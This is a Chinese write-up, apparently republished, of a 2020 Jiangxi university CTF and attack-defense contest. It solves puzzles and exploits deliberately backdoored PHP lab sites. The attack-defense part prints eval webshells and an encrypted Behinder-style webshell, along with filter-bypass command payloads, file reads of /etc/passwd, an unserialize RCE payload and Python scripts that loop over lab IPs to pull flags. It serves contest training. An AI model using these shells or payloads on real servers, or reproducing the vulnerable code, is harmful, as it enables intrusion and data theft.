2020第三届江西省高校网络安全技能大赛 线下赛 CTF&AWD Writeup

其他 2020-10-03 17:45:13 阅读次数: 0

文章目录

CTF

Misc

Boring_exe

!_

..... ..... ..... ..... !?!!. ?.... ..... ..... ..... .?.?! .?... .!...
..... ..... !.?.. ..... !?!!. ?!!!! !!?.? !.?!! !!!.. ..... ..... .!.?.
..... ...!? !!.?. ..... ..?.? !.?.. ..... .!.?. ..... ..... ..!?! !.?!!
!!!!! !!!!! ?.?!. ?!!!! !!!!! !!!!! !!!.? ..... ..... .!?!! .?... .....
..?.? !.?.. ..... ..... ..!.! !!!!! !!!.! !!!!. ?.... ...!? !!.?. .....
?.?!. ?..!. !!!!! !!!!. !!!!! !!!!. ?.... ..... !?!!. ?.... ....? .?!.?
....! .?.

Ook!密码
Ook!在线解密站:https://tool.bugku.com/brainfuck/
在这里插入图片描述
在这里插入图片描述

flag{
    
    Ookisok}

ezAffine

Daylight

感谢江西师范大学:WAXZ战队师傅提供本题的wp

n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690
e1=35
e2=42

#python2
import  gmpy2
import  binascii
import  rsa
import math
from Crypto.Util import number
def exgcd(m, n, x, y):
    if n == 0:
        x = 1
        y = 0
        return (m, x, y)
    a1 = b = 1
    a = b1 = 0
    c = m
    d = n
    q = int(c / d)
    r = c % d
    while r:
        c = d
        d = r
        t = a1
        a1 = a
        a = t - q * a
        t = b1
        b1 = b
        b = t - q * b
        q = int(c / d)
        r = c % d
    x = a
    y = b
    return d, x, y
c1=7706442311376298907118381553814187694306437942337200300920018382827744477296762105669322390236380377042026460058526286493515418722731849971411879053724334926597860433790660568227623266459105700578574867980278136078799958698624620338469216407947276632981229373095281141319203245321172350378427449842394930055529441744690732690189155630980736716300509547085032174345753133838250340838995285142338255951756404101946977370148727459867175980397841996210997274012491629791252693401571504945522427861126234928419824136852180508014703063857673244567242488630499415730763245048617632714296374909199028722650732705222178007385
c2=22423938730620301024336096061283705945892027623793660306239291359418958473934583979350384252488494023600239884048653436314101275290157972045454993641659471672605679497398173588217340705125922148550132426481727445141158741816240665812195493040369287582638492321538655028939958996384211181094086886177394010485535445009088322043647955338445795429449360349339936606800994026319620067195422963814641797851423046506617965736694331256799051468484280532276344029152140431817760731420316457245257243157665090587855008596785240088881665435451552191237548113820151383474872494353994135644477990413743416249730006854238049329690

e1=35
e2=42
e1=e1//7
e2=e2//7
n=24030381175065789627867818021031309186965318861955402618375094156989560631225056400068280970357343617465261811691559275086986164901405512215968447835573713149231336594364799146504286982124850979481910739400555900516891562640944424296188089156508429086638459243074623801424444379741940400624550247210709108293164193827193821978694274672716764474152393429524314859853376325015012885883855819552203740904895242301492787682366135817255276597250505586595070110209229270379691148517421288247672403709484984083988966720494416926899250840012575481136166618973367329708626081023089829778864549053830890201012932527796486827519


ans=exgcd(e1,e2,0,0)
s1=ans[1]
s2=ans[2]
m=(gmpy2.powmod(c1,s1,n)*gmpy2.powmod(c2,s2,n))%n
print gmpy2.iroot(m,7)[1]
while gmpy2.iroot(m,7)[1]==False:
    m=m+n
print m
print number.long_to_bytes(gmpy2.iroot(m,7)[0])

在这里插入图片描述

flag{
    
    1_0nly_see_d4ylight_d4ylight}

Blue

binwalk分析

在这里插入图片描述
foremost分离
在这里插入图片描述
在这里插入图片描述
zip伪加密
在这里插入图片描述
得到blindsql.pcapng
在这里插入图片描述
根据文件名称都知道这是sql盲注的流量包,所以直接过滤出http的包就行了
这是直接GET传参的,可以过滤的更仔细一点

http.request.method==GET

在这里插入图片描述
sql盲注分析,可以看到flag字段的第一位内容的ascii码为:102

>>> chr(102)
'f'

以此类推

flag{
    
    Gre4t_j0B_ON_This_Blue_sh4rk}

Web

Aurora website

上传图片,修改Content-type,根据提示,得知这里应该是条件竞争
使用burp intruder不断发包即可

web2(忘了叫啥名)

感谢江西理工大学:Stalker战队师傅的思路

在这里插入图片描述

Crypto

EasyRSA

在这里插入图片描述

flag{
    
    We1c0meCtf3r_elab}

Interceptedtelegram

在这里插入图片描述
摩斯密码

.- -.-. - .. ----- -. --.- ..- .. -.-. -.-

摩斯密码在线:http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx

在这里插入图片描述

flag{
    
    ACTI0NQUICK}

AWD

AWD1

awd1
├── about.php
├── admin
│   ├── footer.php
│   ├── header.php
│   ├── index.php
│   ├── logout.php
│   ├── upload
│   │   ├── 1596596144.png
│   │   ├── 1600179756.php
│   │   ├── 1600180813.exe
│   │   └── .library.php
│   └── upload.php
├── config.php
├── contact.php
├── css
│   ├── bootstrap.css
│   ├── chocolat.css
│   ├── flexslider.css
│   └── style.css
├── data
│   ├── flot-data.js
│   └── morris-data.js
├── footer.php
├── gulpfile.js
├── header.php
├── images
│   ├── 10.jpg
│   ├── 11.jpg
│   ├── 12.jpg
│   ├── 13.jpg
│   ├── 14.jpg
│   ├── 15.jpg
│   ├── 16.jpg
│   ├── 17.jpg
│   ├── 1.jpg
│   ├── 1.png
│   ├── 2.jpg
│   ├── 2.png
│   ├── 3.jpg
│   ├── 3.png
│   ├── 4.jpg
│   ├── 4.png
│   ├── 5.jpg
│   ├── 5.png
│   ├── 6.jpg
│   ├── 7.jpg
│   ├── 8.jpg
│   ├── 9.jpg
│   ├── banner1.jpg
│   ├── banner.jpg
│   ├── close.png
│   ├── co.png
│   ├── img-sp.png
│   ├── left.png
│   └── right.png
├── index.php
├── js
│   ├── bootstrap.js
│   ├── jquery-1.11.1.min.js
│   ├── jquery.chocolat.js
│   ├── jquery.flexslider.js
│   └── sb-admin-2.js
├── less
│   ├── mixins.less
│   ├── sb-admin-2.less
│   └── variables.less
├── login.php
├── search.php
├── ser.php
├── services.php
├── .shell.php
├── single.php
└── Wopop_files
    ├── askgreen.png
    ├── errorred.png
    ├── google_jquery.min.js
    ├── google_jquery-ui.min.js
    ├── JQuery.cookie.js
    ├── jquery.pagination.js
    ├── jquery.ui.all.css
    ├── loading1.gif
    ├── loadingpn.gif
    ├── login_bgx.gif
    ├── login.js
    ├── login_m_bg.png
    ├── logo.png
    ├── okgreen.png
    ├── pagination.css
    ├── site_bg.png
    ├── style.css
    ├── style_log.css
    ├── userpanel.css
    └── webtemples.js

8 directories, 85 files

利用点1

后门文件:awd1/.shell.php

<?php
$key = $_POST["cmd"];
if(isset($key)){
    
    
$key = str_replace("flag","",$key);
}
eval($key);
?>

只是把flag字符给直接替换为空,利用方法很多

cmd=system("cat /flflagag.txt");
cmd=system("cat /fl''ag.txt");
cmd=system("cat /fla'g'.txt");
cmd=system("cat /fl${9}ag.txt");
cmd=system("cat /fl${IFS}ag.txt");
cmd=system("cat /fl\ag.txt");
cmd=system("cat /`echo 'ZmxhZy50eHQ=' | base64 -d`");
........

在这里插入图片描述

import requests

def post_shell(ip_list):
	flag_path = '/.shell.php'#shell路径
	post_data = 'cmd=system("cat /flflagag.txt");'
	for i in ip_list:
			header_info = {
    
    
			'Host':i,
			'User-Agebt':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0',
			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
			'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
			'Accept-Encoding':'gzip, deflate',
			'Content-Type':'application/x-www-form-urlencoded'
			}
			flag_url = 'http://'+i+flag_path
			res = requests.post(url=flag_url,data=post_data,headers=header_info)
			print("[+]{0}:   {1}\n".format(i,res.text))


if __name__ == '__main__':
	ip_list = \
	 ['172.20.102.101',
	 '172.20.103.101',
	 '172.20.104.101',
	 '172.20.105.101',
	 '172.20.106.101',
	 '172.20.107.101',
	 '172.20.108.101',
	 '172.20.109.101',
	 '172.20.110.101',
	 '172.20.111.101',
	 '172.20.112.101']
	 
	post_shell(ip_list)

利用点2

任意文件读取:awd1/about.php

<?php
	$file=$_GET['file'];
        $file = str_replace("flag","",$file);
        $file = str_replace("../","",$file);
        $file = str_replace("..","",$file);
        $file = str_replace("file://","",$file);
	@print_r(file_get_contents($file));
?>

利用file://伪协议读绝对路径即可,AWD环境中flag的绝对路径都已知:/flag.txt

?file=fifile://le:///flflagag.txt
?file=php://filter/read=convert.base64-encode/resource=/flflagag.txt
......

利用点3

代码执行:awd1/config.php

//根目录
$basedir = ''; 
$shell=@$_POST['shell'];
if(preg_match('/(system|exec|shell|file_|call|open|preg|eval|assert|pass|include|require|key)/i', $shell)) {
    
    
    exit();
}
@eval($shell);

参数绕过代码执行

shell=(s.y.s.t.e.m)('cat /flag.txt');
shell="\x73\x79\x73\x74\x65\x6d"('cat /flag.txt');

在这里插入图片描述

利用点4

任意文件读取:awd1/concat.php

<?php
	include 'header.php';
	$file_path = @$_GET['path'];
	if(file_exists($file_path)){
    
    
		$fp = fopen($file_path,"r");
		$str = fread($fp,filesize($file_path));
		echo $str = str_replace("\r\n","<br />",$str);
	}
?>

?path=/flag.txt
?path=/etc/passwd

利用点5

参数绕过命令执行:awd1/footer.php

<?php 
	$shell=@$_POST['shell'];
	if(preg_match('/(cat|\ |more|flag)/i',$shell)&&str_replace(" ","",$shell)) {
    
    
	    exit();
	}else{
    
    
		@system($shell);
	}
?>

shell=ca''t</fl''ag.txt
shell=`echo${
     
     IFS}Y2F0IC9mbGFnLnR4dAo=|base64${
     
     IFS}-d`
shell=a=ca;b=t;c=fl;d=ag;$a$b${IFS}/$c$d.txt

利用点6

注入:awd1/login.php

<?php
	include_once('config.php');
	if (!empty($_POST['username'])) {
    
    
	$user=$_POST['username'];
	$pass=$_POST['password'];
	$query = "SELECT * FROM admin WHERE user_name='{
      
      $user}' and user_pass='{
      
      $pass}' ";
	$data = mysqli_query($dbc,$query);	
     if (mysqli_num_rows($data) == 1) {
    
    
        $row = mysqli_fetch_array($data);
		$_SESSION['username'] = $row['user_name'];
        header('Location: ./admin/index.php');
     }else{
    
    
       echo '<hr/><center><br/>用户名:',$user,'<br/>密码:',$pass,'<br/><br/>用户名密码错误</center>';
       }
       
} 
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用点7

注入:awd1/search.php

<?php
	include 'header.php';
	include_once('config.php');
	$id=$_GET['id'];
        $check = eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $id);
  if($check){
    
    
echo "Invalid strings!!!Please try agine!";
}else{
    
    
	$query = "SELECT * FROM news WHERE id=$id";
	$data = mysqli_query($dbc,$query);	
	$com = mysqli_fetch_array($data);
}
?>

eregi()函数可以使用%00截断,然后进行注入

ereg()eregi()函数在PHP 7中被弃用了,我这里的容器环境是PHP 7.3,测试时会返回致命错误

在这里插入图片描述
懒得测试了…

利用点8

反序列化代码执行:awd1/ser.php

<?php
class Smi1e
{
    
    
    protected $ClassObj;
    function __construct() {
    
    
        $this->ClassObj = new safe();
    }
    function __destruct() {
    
    
        $this->ClassObj->action();
    }
}

class safe
{
    
    
    function action() {
    
    
        echo "Here is safe";
    }
}

class unsafe
{
    
    
    private $data;
    function action() {
    
    
        eval($this->data);
    }
}

unserialize(@$_GET['test']);

直接构造poc

<?php
class Smi1e
{
    
    
    protected $ClassObj;
    function __construct() {
    
    
        $this->ClassObj = new unsafe();
    }
    function __destruct() {
    
    
        $this->ClassObj->action();
    }
}
class unsafe
{
    
    
    private $data="system('cat /flag.txt');";
    function action() {
    
    
        eval($this->data);
    }
}

$res = new Smi1e();
echo urlencode(serialize($res));
?>

?test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A24%3A%22system%28%27cat+%2Fflag.txt%27%29%3B%22%3B%7D%7D

在这里插入图片描述
PS:吐槽一下出题人写的这个Smi1e类名,这Smi1e直接让我看成Smile。。。。。。。

利用点9

命令执行:awd1/admin/footer.php

<?php 
	$shell=@$_POST['shell'];
	@system($shell);
	if($shell !=""){
    
    
		exit();
	}
?>

shell=cat /flag.txt

利用点10

直接送flag:awd1/admin/index.php

<!-- banner -->
	<div class="banner1">
	</div>
<!-- //banner -->
<!-- single -->
	<div class="single">
		<div class="container">
			<div class="single-page-artical">
				<div class="artical-content">
					<h3>flag:<?php print_r(file_get_contents('/flag'));?></h3>
					<img class="img-responsive" src="../images/banner.jpg" alt=" " />
					<p></p>
				</div>

不过我记得比赛的时候,flag的路径及文件名是:/flag.txt,所以这里比赛的时候是读不出来的

修改为/flag.txt即可读到flag

在这里插入图片描述

利用点11

任意文件上传:awd1/admin/upload.php

<html lang="zh-CN">
  <head>
    <meta charset="utf-8">
<?php
include_once('../config.php');
if (isset($_SESSION['username'])) {
    
    
        include_once('header.php');
        $html_username = htmlspecialchars($_SESSION['username']);
        if(isset($_SESSION['error_info']) && $_SESSION['error_info'] != '') {
    
    
                echo $_SESSION['error_info'];
                $_SESSION['error_info'] = '';
        }
}
else {
    
    
	header('Location: ../login.php');
}
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
try{
    
    
	if($name!=="")
	{
    
    
		$name1=substr($name,-4);
		if(is_uploaded_file($tmpName)){
    
    
			$time=time();
			$rootpath='./upload/'.$time.$name1;
			$file=fopen($tmpName, "r") or die('No such file!');
                	$content=fread($file, filesize($tmpName));
                	if(strstr($content,'fuck')){
    
    
                        	exit("<script language='JavaScript'>alert('You should not do this!');window.location='index.php?page=submit'</script>");
                	}
			if(!move_uploaded_file($tmpName,$rootpath)){
    
    
				echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";
				exit;
			}
		}
		echo "上传成功:/upload/".$time.$name1;
	}
}
catch(Exception $e)
{
    
    
	echo "ERROR";
}
//
require('footer.php');
 ?>
 </html>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
awd1/admin/upload/1600179756.php题目本身存放了一个命令执行后门

//1600179756.php
<?php system($_GET['cmd']);?>

利用点12

冰蝎马:awd1/admin/upload/.library.php

<?php
@error_reporting(0);
session_start();
if (isset($_GET['djicoieDJNCIVD']))
{
    
    
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    
    
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
    
    
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    
    
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
    
    
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{
    
    public function __construct($p) {
    
    eval($p."");}}
	@new C($params);
}
?>

冰蝎马:https://www.t00ls.net/articles-56337.html

PS C:\Users\Administrator\Desktop> php -r "echo openssl_encrypt('|system(\'whoami\');','AES128','');"
sbD9xXGKpb2/BSn/O/gPNg0MrbwusxVXLEVTNRXyGcc=

在这里插入图片描述

AWD2

利用点1

文件读取直接送flag:ecshop/a.php

<?php
if(isset($_GET['shop'])){
    
    
echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}
?>

PS C:\Users\Administrator> php -r "var_dump(base64_decode('L2ZsYWcudHh0'));"
string(9) "/flag.txt"

import requests

def get_shell(ip_list):
	flag_path = '/a.php'
	pwd = 'shop'
	command = 'test'

	for i in ip_list:
		flag_url = 'http://'+i+flag_path+'/?'+pwd +'='+command
		res = requests.get(url=flag_url)
		print("[+]{0}:   {1}\n".format(i,res.text))


if __name__ == '__main__':
	ip_list = \
	 ['172.20.102.102',
	 '172.20.103.102',
	 '172.20.104.102',
	 '172.20.105.102',
	 '172.20.106.102',
	 '172.20.107.102',
	 '172.20.108.102',
	 '172.20.109.102',
	 '172.20.110.102',
	 '172.20.111.102',
	 '172.20.112.102']
	get_shell(ip_list)

利用点2

命令执行:ecshop/api.php

$hook = $_GET['s'];
if(isset($hook)){
    
    
    echo `$hook`;
}

?s=cat /flag.txt

在这里插入图片描述

利用点3

文件读取直接送flag:ecshop/check_file.php

if(isset($_GET['shop'])){
    
    
echo file_get_contents(base64_decode('L2ZsYWcudHh0'));}

在这里插入图片描述

利用点4

文件读取送flag:ecshop/config.php

f(isset($_GET['shop'])){
    
    
echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?><?php
if(isset($_GET['shop'])){
    
    
echo file_get_contents(base64_decode('ZmxhZy50eHQ='));}
?>

不过这里flag.txt路径写错了,所以读不出来

PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZy50eHQ='));"
string(8) "flag.txt"

猜你喜欢

转载自blog.csdn.net/mochu7777777/article/details/108614900
今日推荐
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
周排行
Family Tree 题解
BZOJ 1093 最大半连通子图 SCC + DP
幂等处理
Spring----学习(2)----XML 配置Bean 自动装配
SQL Server 远程更新目标表数据
HIbernate3.6 环境搭建
特殊符号正则表达式
【Linux】第一章 进程的理解
843. n-皇后问题(dfs+输出各种情况)
空间数据库2
每日归档
更多
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022